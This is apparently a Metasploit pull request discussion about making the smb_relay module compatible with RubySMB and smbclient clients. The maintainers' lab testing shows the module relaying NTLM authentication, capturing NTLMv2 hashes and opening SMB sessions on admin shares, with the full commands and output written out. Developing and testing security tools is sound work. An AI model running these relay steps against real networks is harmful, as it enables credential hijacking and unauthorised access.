Add support for Ruby SMB Client to be compatible with Msf::Exploit::Remote::SMB::RelayServer

[jheysel-r7]

This fixes the following issues:

1. Ruby SMB Client is incompatible with Msf::Exploit::Remote::SMB::RelayServer.
   In order to relay NTLM authentication from a Ruby SMB client properly the NTLMSSP messages must first be unwrapped from their GSSAPI wrapping. The Window's net use does not wrap it's NTLM message and is partially why Metasploit's smb_relay has only worked with net use - until now!

2. smbclient is not compatible with Msf::Exploit::Remote::SMB::RelayServer
   Not all smbclients respond with a reauthentication attempt to the error code STATUS_NETWORK_SESSION_EXPIRED which our smb_relay server depended upon until now. This fixes the smb_relay server so that if only one RHOST is specified, NTLM authentication is immediately forwarded. This allows smbclient and others to be compatible the smb_relay when only specifying one target.

Due to do the large number of PRs and the fact that both of these fixes require the related fix in ruby_smb I figured I'd combine them.

Requirements

This fix requires changes from ruby_smb. Be sure to pull in those changes and reference your local copy of ruby_smb in your Gemfile prior to testing:

gem 'ruby_smb', path: '../ruby_smb'

Testing

1. Start the relay server - input multiple RHOSTs to ensure the relay server is still able to relay to multiple targets

msf exploit(windows/smb/smb_relay) > set smbdomain kerberos.issue
smbdomain => kerberos.issue
msf exploit(windows/smb/smb_relay) > set rhosts 172.16.199.199 172.16.199.200 
rhosts => 172.16.199.199 172.16.199.200
msf exploit(windows/smb/smb_relay) > run 
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444 
msf exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.

(The relay server out will be continued below)

2. Start a second instance of msfconsole and run the smb_login module sending the authentication request to your relay server

msf auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   CreateSession      false            no        Create a new session for every successful login
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             172.16.199.1     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          kerberos.issue   no        The Windows domain to use for authentication
   SMBPass            N0tpassword!     no        The password for the specified username
   SMBUser            administrator    no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/smb/smb_login) > run
[*] 172.16.199.1:445      - 172.16.199.1:445      - Starting SMB login bruteforce
[+] 172.16.199.1:445      - 172.16.199.1:445      - Success: 'kerberos.issue\administrator:N0tpassword!'
[*] 172.16.199.1:445      - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.199.1:445      - Bruteforce completed, 1 credential was successful.
[*] 172.16.199.1:445      - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >

3. Back in your relay server, see that the authentication request was successful and you now have an SMB session you can interact with:

[*] New request from 172.16.199.1
I, [2026-02-12T13:45:51.508983 #39704]  INFO -- : Starting thread for connection from 172.16.199.1
I, [2026-02-12T13:45:51.907731 #39704]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-02-12T13:45:51.949415 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-02-12T13:45:52.014548 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: nil, state: :in_progress>)
I, [2026-02-12T13:45:52.026555 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:45:52.124182 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445
[-] Timeout error retrieving server challenge from target smb://172.16.199.199:445. Most likely caused by unresponsive target
D, [2026-02-12T13:46:17.229921 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
D, [2026-02-12T13:46:17.278971 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:17.297245 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:46:17.332264 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.200:445
D, [2026-02-12T13:46:17.362174 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.765084 #39704]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-02-12T13:46:30.849669 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.851325 #39704]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as kerberos.issue\administrator
[+] Identity: kerberos.issue\administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : kerberos.issue\administrator
[SMB] NTLMv2-SSP Hash       : administrator::kerberos.issue:0d0719bece0ac1ce:51c99ec599139b20872db55375008ee2:0101000000000000003fef0b699cdc013483b98a24ef08f300000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e006900730073007500650007000800ecb6690c699cdc010000000000000000

[*] SMB session 6 opened (172.16.199.1:58102 -> 172.16.199.200:445) at 2026-02-12 13:46:51 -0800
D, [2026-02-12T13:46:51.315641 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445


msf exploit(windows/smb/smb_relay) > msf exploit(windows/smb/smb_relay) > 
msf exploit(windows/smb/smb_relay) > sessions -i -1 
[*] Starting interaction with 6...

SMB (172.16.199.200) > shares
Shares
======

    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  IPC$      IPC|SPECIAL   Remote IPC
    3  NETLOGON  DISK          Logon server share
    4  SYSVOL    DISK          Logon server share

SMB (172.16.199.200) > 

4. Kill the relay server job with jobs -K, set only one RHOST and verify auth can be successfully relayed to one target by smbclient (or any client that doesn't support resending an authentication to the session expired smb status code )

Trigger the relay like so:

(.venv) (devbox) ➜  smbcmp git:(master) ✗ smbclient //172.16.199.1/ADMIN$ -U KERBEROS\\Administrator%N0tpassword!
session setup failed: NT_STATUS_INVALID_PARAMETER

And verify it works:

msf exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/smb/smb_relay) > [*] 172.16.199.200:445 - SMB Server is running. Listening on 0.0.0.0:445
[*] 172.16.199.200:445 - Server started.
[*] 172.16.199.200:445 - New request from 172.16.199.131
I, [2026-03-16T20:30:53.171534 #85581]  INFO -- : Starting thread for connection from 172.16.199.131
I, [2026-03-16T20:30:53.281599 #85581]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-16T20:30:53.293959 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
[*] 172.16.199.200:445 - Relaying to next target smb://172.16.199.200:445
I, [2026-03-16T20:30:53.342984 #85581]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: false)
D, [2026-03-16T20:30:53.385423 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 1574663220, user_id: nil, state: :in_progress>)
I, [2026-03-16T20:30:53.403892 #85581]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as
[+] 172.16.199.200:445 - Identity:  - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : KERBEROS\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::KERBEROS:68344e5d7e5f70d1:6f3168b10ab785b56c7d731629a69c8c:0101000000000000fa747875beb5dc01ad756f882617c1e700000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e006900730073007500650007000800fa747875beb5dc0106000400020000000800300030000000000000000000000000000000d810e83dd97e782193d89a1a94bbb081ffc280d879b135ddaa28ee71a905623a0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e00310000000000

[*] SMB session 1 opened (172.16.199.1:59507 -> 172.16.199.200:445) at 2026-03-16 20:30:55 -0700
I, [2026-03-16T20:30:55.303934 #85581]  INFO -- : Ending thread for connection from 172.16.199.131

[github-actions]

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We've added the additional-testing-required label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting here.

[jenkins-eks-metasploit]

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

[jenkins-eks-metasploit]

Pipeline results available

Slice summary:

• Test slice 1 - 🟢
• Test slice 2 - 🟢
• Test slice 3 - 🟢
• Test slice 4 - 🟢

Note: build results only accessible to maintainers.

[cdelafuente-r7]

Thanks @jheysel-r7 for these updates. I tested it and it works great using one or two relay targets with the RubySMB client. I just left a few comments and questions.

One issue I found with a very specific use case is when you create a SMB session from the client, while it's being relayed by a second instance of msfconcole. The resulting SMB session ends up to be unusable.

msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
[*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
[+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
[!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.22.129:38481 -> 192.168.22.1:445) at 2026-03-19 13:17:42 +0100
[*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.22.1:445     - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions

Active sessions
===============

  Id  Name  Type  Information                      Connection
  --  ----  ----  -----------                      ----------
  2         smb   SMB smbuser @ 192.168.22.1:445  192.168.22.129:38481 -> 192.168.22.1:445 (192.168.22.1)

msf auxiliary(scanner/smb/smb_login) > use scanner/smb/smb_enumshares
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=192.168.22.1 session=2
[*] Using existing session 2
[*] Error: 192.168.22.1: RubySMB::Error::CommunicationError Socket read returned nil
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I believe this is not something a user would do often, and doing so would inevitably result in a failure, but I just wanted to call it out.

[jheysel-r7]

Thanks for the review @cdelafuente-r7! Much appreciated. I thought I had seen that unusable SMB session issue before as well. After ensuring all the necessary registry keys were set appropriately to allow for SMB relaying, doing more testing to ensure the PSEXEC action was working, I wasn't able to reproduce the broken SMB session. The following output was triggered by relaying auth from a separate msfconsole window using smb_login:

smb_relay CREATE_SMB_SESSION working

The following output highlights the only changes I have on the branch are pulling in the ruby_smb changes:

➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ git status
On branch fix/lib/smb_relay_ruby_client_support
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
	modified:   Gemfile
	modified:   Gemfile.lock

no changes added to commit (use "git add" and/or "git commit -a")
➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ bundle install
Bundle complete! 20 Gemfile dependencies, 245 gems now installed.
Bundled gems are installed into `../../.vendor/bundle`
1 installed gem you directly depend on is looking for funding.
  Run `bundle fund` for details
➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ ./msfconsole -q
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] Setting default action CREATE_SMB_SESSION - view all 2 actions with the show actions command
[*] New in Metasploit 6.4 - The CREATE_SMB_SESSION action within this module can open an interactive session
msf exploit(windows/smb/smb_relay) > options

Module options (exploit/windows/smb/smb_relay):

   Name                  Current Setting                Required  Description
   ----                  ---------------                --------  -----------
   JOHNPWFILE                                           no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can also be a path.
   RELAY_TIMEOUT         25                             yes       Seconds that the relay socket will wait for a response after the client has initiated communication.
   RHOSTS                172.16.199.200 172.16.199.135  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   SERVICE_DESCRIPTION                                  no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                 no        The service display name
   SERVICE_NAME                                         no        The service name
   SMBDomain             .                              no        The Windows domain to use for authentication
   SMBSHARE                                             no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SRVHOST               0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT               445                            yes       The local port to listen on.
   SRV_TIMEOUT           25                             yes       Seconds that the server socket will wait for a response after the client has initiated communication.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PowerShell



Exploit action:

   Name                Description
   ----                -----------
   CREATE_SMB_SESSION  Do not close the SMB connection after relaying, and instead create an SMB session



View the full module info with the info, or info -d command.

msf exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 172.16.199.1
I, [2026-03-19T09:32:03.098589 #62454]  INFO -- : Starting thread for connection from 172.16.199.1
I, [2026-03-19T09:32:03.250210 #62454]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-19T09:32:03.260397 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-03-19T09:32:03.288294 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: nil, state: :in_progress>)
I, [2026-03-19T09:32:03.292005 #62454]  INFO -- : NTLM authentication request overridden to succeed for .\administrator
D, [2026-03-19T09:32:03.325168 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Relaying to next target smb://172.16.199.200:445
D, [2026-03-19T09:32:03.349811 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:03.382881 #62454]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-19T09:32:03.426573 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:03.432395 #62454]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as .\administrator
[+] Identity: .\administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[*] Skipping previously captured hash for .\administrator
[*] SMB session 1 opened (172.16.199.1:58377 -> 172.16.199.200:445) at 2026-03-19 09:32:05 -0700
D, [2026-03-19T09:32:05.104704 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Relaying to next target smb://172.16.199.135:445
D, [2026-03-19T09:32:05.118577 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:05.120336 #62454]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.135:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-19T09:32:05.151429 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:05.152408 #62454]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.135:445 as .\administrator
[+] Identity: .\administrator - Successfully authenticated against relay target smb://172.16.199.135:445
[*] Skipping previously captured hash for .\administrator
[*] SMB session 2 opened (172.16.199.1:58379 -> 172.16.199.135:445) at 2026-03-19 09:32:05 -0700
D, [2026-03-19T09:32:05.816909 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Identity: .\administrator - All targets relayed to
W, [2026-03-19T09:32:05.818628 #62454]  WARN -- : Received TREE_CONNECT request for non-existent share: admin$
D, [2026-03-19T09:32:05.839730 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Identity: .\administrator - All targets relayed to
D, [2026-03-19T09:32:05.840785 #62454] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2026-03-19T09:32:05.861408 #62454] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
I, [2026-03-19T09:32:05.869936 #62454]  INFO -- : Ending thread for connection from 172.16.199.1

msf exploit(windows/smb/smb_relay) > sessions -l

Active sessions
===============

  Id  Name  Type         Information                Connection
  --  ----  ----         -----------                ----------
  1         smb windows  SMB  @ 172.16.199.200:445  172.16.199.1:58377 -> 172.16.199.200:445 (172.16.199.200)
  2         smb windows  SMB  @ 172.16.199.135:445  172.16.199.1:58379 -> 172.16.199.135:445 (172.16.199.200)

msf exploit(windows/smb/smb_relay) > use scanner/smb/smb_enumshares
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=172.16.199.200 session=1
[*] Using existing session 1
[!] peer_native_os is only available with SMB1 (current version: SMB3)
[!] peer_native_lm is only available with SMB1 (current version: SMB3)
[+] ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] C$ - (DISK|SPECIAL) Default share
[+] IPC$ - (IPC|SPECIAL) Remote IPC
[+] NETLOGON - (DISK) Logon server share
[+] SYSVOL - (DISK) Logon server share
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=172.16.199.135 session=2
[*] Using existing session 2
[!] peer_native_os is only available with SMB1 (current version: SMB3)
[!] peer_native_lm is only available with SMB1 (current version: SMB3)
[+] ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] C$ - (DISK|SPECIAL) Default share
[+] IPC$ - (IPC|SPECIAL) Remote IPC
[+] NETLOGON - (DISK) Logon server share
[+] SMB_TESTING - (DISK)
[+] SYSVOL - (DISK) Logon server share
[+] Users - (DISK)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[cdelafuente-r7]

Oh! I'm sorry I think I was not clear. I was talking about the session created by the client running smb_login, the one using the RubySMB client to connect to the relay server. The sessions created by the smb_relay work perfectly.

msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
[*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
[+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
[!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
[*] SMB session 1 opened (192.168.22.129:41197 -> 192.168.22.1:445) at 2026-03-23 19:01:47 +0100
[*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.22.1:445     - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions -1
[*] Starting interaction with 1...

SMB (192.168.22.1) > shares
[-] Error running command shares: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_NOT_SUPPORTED

In this example, the client (smb_login) is 192.168.22.129 and it authenticates to the relay server on 192.168.22.1. I specifically ask for a session with the CreateSession option, which apparently works. However, when trying to interact with the session, it fails.

It is certainly an edge case that is not worth fixing, unless it is an easy fix, but I don't think so.

[jheysel-r7]

Oh! I'm sorry I think I was not clear. I was talking about the session created by the client running smb_login, the one using the RubySMB client to connect to the relay server. The sessions created by the smb_relay work perfectly.

msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
[*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
[+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
[!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
[*] SMB session 1 opened (192.168.22.129:41197 -> 192.168.22.1:445) at 2026-03-23 19:01:47 +0100
[*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.22.1:445     - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions -1
[*] Starting interaction with 1...

SMB (192.168.22.1) > shares
[-] Error running command shares: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_NOT_SUPPORTED

In this example, the client (smb_login) is 192.168.22.129 and it authenticates to the relay server on 192.168.22.1. I specifically ask for a session with the CreateSession option, which apparently works. However, when trying to interact with the session, it fails.

It is certainly an edge case that is not worth fixing, unless it is an easy fix, but I don't think so.

Oh okay, right my apologies. I thought that was to be expected (although maybe it's not!). Whenever I would relay successfully from net use the session on the Windows client would never be usable, ie net use would fail with a number of different errors.

The smb_login module receives a Metasploit::Model::Login::Status::SUCCESSFUL from the relay server (because the relay server authenticated successfully) and then based on that it opens a session with the connection it had established with the relay server. The smb_login module is unaware that the successful login it received was against a different target than it originally connected to. The smb_login module trusts the successfully authentication status and doesn't do much verification before opening the session here:

metasploit-framework/modules/auxiliary/scanner/smb/smb_login.rb

Lines 317 to 332 in c49a376

	# @param [Metasploit::Framework::LoginScanner::Result] result
	# @return [Msf::Sessions::SMB]
	def session_setup(result)
	return unless (result.connection && result.proof)
	my_session = Msf::Sessions::SMB.new(result.connection, { client: result.proof })
	merge_me = {
	'USERPASS_FILE' => nil,
	'USER_FILE' => nil,
	'PASS_FILE' => nil,
	'USERNAME' => result.credential.public,
	'PASSWORD' => result.credential.private
	}
	start_session(self, nil, merge_me, false, my_session.rstream, my_session)
	end

I think this would require some extra verification that it might not be worth subjecting every SMB session to for this edge case - although let me know what you think!

[jenkins-eks-metasploit]

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

[cdelafuente-r7]

Thank you for the last updates. I agree, it is not worth updating the original code for this. everything looks good to me. I tested with two relay targets and successfully got two sessions using another instance of msfconsole running smb_login module. This works with both SMB and PSEXEC sessions.

msf exploit(windows/smb/smb_relay) >
[*] New request from 192.168.220.129
I, [2026-03-24T14:19:51.823599 #55100]  INFO -- : Starting thread for connection from 192.168.220.129
I, [2026-03-24T14:19:51.839340 #55100]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-24T14:19:51.843592 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-03-24T14:19:51.858141 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: nil, state: :in_progress>)
I, [2026-03-24T14:19:51.858491 #55100]  INFO -- : NTLM authentication request overridden to succeed for .\smbuser
D, [2026-03-24T14:19:51.862891 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Relaying to next target smb://192.168.5.10:445
D, [2026-03-24T14:19:52.102007 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.131849 #55100]  INFO -- : Relaying NTLM type 1 message to smb://192.168.5.10:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-24T14:19:52.165396 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.166219 #55100]  INFO -- : Relaying NTLMv2 type 3 message to smb://192.168.5.10:445 as .\smbuser
[+] Identity: .\smbuser - Successfully authenticated against relay target smb://192.168.5.10:445
[*] Skipping previously captured hash for .\smbuser
[*] SMB session 1 opened (192.168.5.40:59081 -> 192.168.5.10:445) at 2026-03-24 14:19:52 +0100
D, [2026-03-24T14:19:52.531666 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Relaying to next target smb://192.168.220.134:445
D, [2026-03-24T14:19:52.543412 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.544122 #55100]  INFO -- : Relaying NTLM type 1 message to smb://192.168.220.134:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-24T14:19:52.567340 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.567859 #55100]  INFO -- : Relaying NTLMv2 type 3 message to smb://192.168.220.134:445 as .\smbuser
[+] Identity: .\smbuser - Successfully authenticated against relay target smb://192.168.220.134:445
[*] Skipping previously captured hash for .\smbuser
[*] SMB session 2 opened (192.168.220.1:59083 -> 192.168.220.134:445) at 2026-03-24 14:19:52 +0100
D, [2026-03-24T14:19:52.867848 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Identity: .\smbuser - All targets relayed to
W, [2026-03-24T14:19:52.869012 #55100]  WARN -- : Received TREE_CONNECT request for non-existent share: admin$
D, [2026-03-24T14:19:52.884060 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Identity: .\smbuser - All targets relayed to
D, [2026-03-24T14:19:52.884943 #55100] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2026-03-24T14:19:52.896604 #55100] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
I, [2026-03-24T14:19:52.902941 #55100]  INFO -- : Ending thread for connection from 192.168.220.129

msf exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type         Information                 Connection
  --  ----  ----         -----------                 ----------
  1         smb windows  SMB  @ 192.168.5.10:445     192.168.5.40:59081 -> 192.168.5.10:445 (192.168.5.10)
  2         smb windows  SMB  @ 192.168.220.134:445  192.168.220.1:59083 -> 192.168.220.134:445 (192.168.5.10)

msf exploit(windows/smb/smb_relay) > sessions -i 1
[*] Starting interaction with 1...

SMB (192.168.5.10) > shares
Shares
======

    #  Name    Type          comment
    -  ----    ----          -------
    0  ADMIN$  DISK|SPECIAL  Remote Admin
    1  C$      DISK|SPECIAL  Default share
